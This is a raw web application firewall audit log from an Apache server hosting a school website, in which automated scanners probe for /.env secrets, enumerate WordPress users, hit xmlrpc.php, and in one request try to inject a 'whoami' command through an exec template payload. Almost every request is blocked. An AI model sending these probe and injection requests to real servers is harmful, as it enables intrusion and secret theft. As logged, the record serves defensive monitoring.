X-Real-IP: 156.228.78.11
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 156.228.78.11
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
--904dab34-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--904dab34-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745499564521843 2907 (- - -)
Stopwatch2: 1745499564521843 2907; combined=1440, p1=489, p2=918, p3=0, p4=0, p5=33, sr=75, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--904dab34-Z--
--6a8d370e-A--
[24/Apr/2025:19:59:30 +0700] aAo1st5yz20UX9VrdZNGiQAAAEY 103.236.140.4 35680 103.236.140.4 8181
--6a8d370e-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 156.228.78.11
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 156.228.78.11
X-Forwarded-Proto: https
Connection: close
Content-Length: 136
Content-Type: text/plain; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26)
--6a8d370e-C--
demo.sayHello
--6a8d370e-F--
HTTP/1.1 301 Moved Permanently
Location: https://www.smkn22jakarta.sch.id/xmlrpc.php
Content-Length: 251
Connection: close
Content-Type: text/html; charset=iso-8859-1
--6a8d370e-H--
Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745499570951074 5530 (- - -)
Stopwatch2: 1745499570951074 5530; combined=4502, p1=581, p2=3550, p3=31, p4=36, p5=166, sr=75, sw=138, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--6a8d370e-Z--
--bc351141-A--
[24/Apr/2025:20:16:19 +0700] aAo5o2Luk3f9kLjsdTYDoQAAAI8 103.236.140.4 39616 103.236.140.4 8181
--bc351141-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.86.64
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.86.64
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 8.0.0; SM-J737A) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Mobile Safari/537.36
Accept-Charset: utf-8
--bc351141-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--bc351141-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745500579972684 893 (- - -)
Stopwatch2: 1745500579972684 893; combined=366, p1=327, p2=0, p3=0, p4=0, p5=38, sr=130, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--bc351141-Z--
--c1481d2c-A--
[24/Apr/2025:20:19:45 +0700] aAo6cWLuk3f9kLjsdTYD0AAAAIk 103.236.140.4 40408 103.236.140.4 8181
--c1481d2c-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.87.86
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.87.86
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 9; ONEPLUS A6013) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3880.5 Mobile Safari/537.36
Accept-Charset: utf-8
--c1481d2c-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--c1481d2c-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745500785908804 790 (- - -)
Stopwatch2: 1745500785908804 790; combined=356, p1=325, p2=0, p3=0, p4=0, p5=31, sr=128, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--c1481d2c-Z--
--21821862-A--
[24/Apr/2025:20:25:00 +0700] aAo7rN5yz20UX9VrdZNHtAAAAFA 103.236.140.4 41660 103.236.140.4 8181
--21821862-B--
GET /wp-json/wp/v2/users HTTP/1.0
Referer: https://www.google.com
Host: smkn22-jkt.sch.id
X-Real-IP: 156.228.98.164
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 156.228.98.164
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
--21821862-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--21821862-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745501100121949 2617 (- - -)
Stopwatch2: 1745501100121949 2617; combined=1216, p1=425, p2=761, p3=0, p4=0, p5=30, sr=72, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--21821862-Z--
--b9594b70-A--
[24/Apr/2025:20:25:06 +0700] aAo7smLuk3f9kLjsdTYEEwAAAI8 103.236.140.4 41692 103.236.140.4 8181
--b9594b70-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 156.228.98.164
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 156.228.98.164
X-Forwarded-Proto: https
Connection: close
Content-Length: 136
Content-Type: text/plain; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26)
--b9594b70-C--
demo.sayHello
--b9594b70-F--
HTTP/1.1 301 Moved Permanently
Location: https://www.smkn22jakarta.sch.id/xmlrpc.php
Content-Length: 251
Connection: close
Content-Type: text/html; charset=iso-8859-1
--b9594b70-H--
Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745501106663694 5866 (- - -)
Stopwatch2: 1745501106663694 5866; combined=4282, p1=582, p2=3454, p3=30, p4=35, p5=105, sr=131, sw=76, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--b9594b70-Z--
--1b2e733b-A--
[24/Apr/2025:20:27:07 +0700] aAo8K2Luk3f9kLjsdTYEUQAAAI0 103.236.140.4 42174 103.236.140.4 8181
--1b2e733b-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.86.64
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.86.64
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/600.8.9 (KHTML, like Gecko) Version/8.0.8 Safari/600.8.9
Accept-Charset: utf-8
--1b2e733b-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--1b2e733b-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745501227779839 776 (- - -)
Stopwatch2: 1745501227779839 776; combined=341, p1=304, p2=0, p3=0, p4=0, p5=37, sr=116, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--1b2e733b-Z--
--9ab68a53-A--
[24/Apr/2025:20:29:28 +0700] aAo8uGLuk3f9kLjsdTYEcgAAAIw 103.236.140.4 42728 103.236.140.4 8181
--9ab68a53-B--
GET /wp-json/wp/v2/users HTTP/1.0
Referer: https://www.google.com
Host: smkn22-jkt.sch.id
X-Real-IP: 156.242.47.194
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 156.242.47.194
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
--9ab68a53-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--9ab68a53-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745501368909594 2866 (- - -)
Stopwatch2: 1745501368909594 2866; combined=1284, p1=421, p2=832, p3=0, p4=0, p5=31, sr=77, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--9ab68a53-Z--
--deffdb2b-A--
[24/Apr/2025:20:29:36 +0700] aAo8wMlQo524fhbIj1z1EgAAAAI 103.236.140.4 42760 103.236.140.4 8181
--deffdb2b-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 156.242.47.194
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 156.242.47.194
X-Forwarded-Proto: https
Connection: close
Content-Length: 136
Content-Type: text/plain; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26)
--deffdb2b-C--
demo.sayHello
--deffdb2b-F--
HTTP/1.1 301 Moved Permanently
Location: https://www.smkn22jakarta.sch.id/xmlrpc.php
Content-Length: 251
Connection: close
Content-Type: text/html; charset=iso-8859-1
--deffdb2b-H--
Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745501376228475 5764 (- - -)
Stopwatch2: 1745501376228475 5764; combined=4414, p1=582, p2=3601, p3=35, p4=36, p5=97, sr=73, sw=63, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--deffdb2b-Z--
--cd64a25d-A--
[24/Apr/2025:20:51:26 +0700] aApB3viVYlyO1xhz7yMw9AAAAMU 103.236.140.4 45458 103.236.140.4 8181
--cd64a25d-B--
GET /wp-json/wp/v2/users HTTP/1.0
Referer: https://www.google.com
Host: smkn22-jkt.sch.id
X-Real-IP: 154.213.163.71
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 154.213.163.71
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
--cd64a25d-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--cd64a25d-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745502686681070 3081 (- - -)
Stopwatch2: 1745502686681070 3081; combined=1414, p1=446, p2=925, p3=0, p4=0, p5=42, sr=70, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--cd64a25d-Z--
--266bc07b-A--
[24/Apr/2025:20:51:32 +0700] aApB5MlQo524fhbIj1z96AAAAAw 103.236.140.4 45858 103.236.140.4 8181
--266bc07b-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 154.213.163.71
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 154.213.163.71
X-Forwarded-Proto: https
Connection: close
Content-Length: 136
Content-Type: text/plain; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26)
--266bc07b-C--
demo.sayHello
--266bc07b-F--
HTTP/1.1 301 Moved Permanently
Location: https://www.smkn22jakarta.sch.id/xmlrpc.php
Content-Length: 251
Connection: close
Content-Type: text/html; charset=iso-8859-1
--266bc07b-H--
Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745502692865262 8099 (- - -)
Stopwatch2: 1745502692865262 8099; combined=6351, p1=722, p2=5309, p3=59, p4=78, p5=110, sr=68, sw=73, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--266bc07b-Z--
--857be613-A--
[24/Apr/2025:21:45:31 +0700] aApOi_iVYlyO1xhz7yNjrAAAANg 103.236.140.4 45712 103.236.140.4 8181
--857be613-B--
GET /?n=%0A&cmd=whoami&search=%25xxx%25url%25:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.} HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 103.93.252.194
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 103.93.252.194
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Upgrade-Insecure-Requests: 1
--857be613-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--857be613-E--
--857be613-H--
Message: Access denied with code 403 (phase 2). Invalid URL Encoding: Non-hexadecimal digits used at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "82"] [id "210381"] [rev "6"] [msg "COMODO WAF: URL Encoding Abuse Attack Attempt||103.236.140.4|F|4"] [data "REQUEST_URI=/?n=%0A&cmd=whoami&search=%25xxx%25url%25:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}"] [severity "WARNING"] [tag "CWAF"] [tag "Protocol"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745505931039884 2938 (- - -)
Stopwatch2: 1745505931039884 2938; combined=1774, p1=418, p2=1310, p3=0, p4=0, p5=46, sr=73, sw=0, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--857be613-Z--
--a393ce16-A--
[24/Apr/2025:22:06:25 +0700] aApTcfiVYlyO1xhz7yNvMAAAAMU 103.236.140.4 39620 103.236.140.4 8181
--a393ce16-B--
GET /wp-json/wp/v2/users HTTP/1.0
Referer: https://www.google.com
Host: smkn22-jkt.sch.id
X-Real-IP: 156.248.83.10
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 156.248.83.10
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
--a393ce16-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--a393ce16-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745507185620879 2464 (- - -)
Stopwatch2: 1745507185620879 2464; combined=1105, p1=396, p2=684, p3=0, p4=0, p5=24, sr=60, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--a393ce16-Z--
--5027364c-A--
[24/Apr/2025:22:06:31 +0700] aApTd_iVYlyO1xhz7yNvNwAAAMw 103.236.140.4 39772 103.236.140.4 8181
--5027364c-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 156.248.83.10
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 156.248.83.10
X-Forwarded-Proto: https
Connection: close
Content-Length: 136
Content-Type: text/plain; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26)
--5027364c-C--
demo.sayHello
--5027364c-F--
HTTP/1.1 301 Moved Permanently
Location: https://www.smkn22jakarta.sch.id/xmlrpc.php
Content-Length: 251
Connection: close
Content-Type: text/html; charset=iso-8859-1
--5027364c-H--
Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745507191689586 6991 (- - -)
Stopwatch2: 1745507191689586 6991; combined=4909, p1=628, p2=3996, p3=38, p4=44, p5=117, sr=77, sw=86, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--5027364c-Z--
--b97ea92c-A--
[24/Apr/2025:22:26:03 +0700] aApYC2Luk3f9kLjsdTZNawAAAIY 103.236.140.4 40720 103.236.140.4 8181
--b97ea92c-B--
GET /wp-json/wp/v2/users HTTP/1.0
Referer: https://www.google.com
Host: smkn22-jkt.sch.id
X-Real-IP: 156.228.178.119
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 156.228.178.119
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
--b97ea92c-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--b97ea92c-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745508363758466 2694 (- - -)
Stopwatch2: 1745508363758466 2694; combined=1229, p1=410, p2=789, p3=0, p4=0, p5=29, sr=77, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--b97ea92c-Z--
--587a8f00-A--
[24/Apr/2025:22:26:11 +0700] aApYE8lQo524fhbIj1xHfwAAAA4 103.236.140.4 40912 103.236.140.4 8181
--587a8f00-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 156.228.178.119
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 156.228.178.119
X-Forwarded-Proto: https
Connection: close
Content-Length: 136
Content-Type: text/plain; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26)
--587a8f00-C--
demo.sayHello
--587a8f00-F--
HTTP/1.1 301 Moved Permanently
Location: https://www.smkn22jakarta.sch.id/xmlrpc.php
Content-Length: 251
Connection: close
Content-Type: text/html; charset=iso-8859-1
--587a8f00-H--
Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745508371216146 7907 (- - -)
Stopwatch2: 1745508371216146 7907; combined=6005, p1=755, p2=4990, p3=46, p4=61, p5=91, sr=77, sw=62, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--587a8f00-Z--
--11247228-A--
[24/Apr/2025:22:32:10 +0700] aApZeslQo524fhbIj1xJ_wAAAAA 103.236.140.4 49634 103.236.140.4 8181
--11247228-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 178.128.207.219
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 178.128.207.219
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);
Accept: */*
--11247228-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--11247228-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745508730833096 650 (- - -)
Stopwatch2: 1745508730833096 650; combined=293, p1=263, p2=0, p3=0, p4=0, p5=30, sr=90, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--11247228-Z--
--97f4ed32-A--
[24/Apr/2025:22:40:00 +0700] aApbUGLuk3f9kLjsdTZUBQAAAIY 103.236.140.4 60846 103.236.140.4 8181
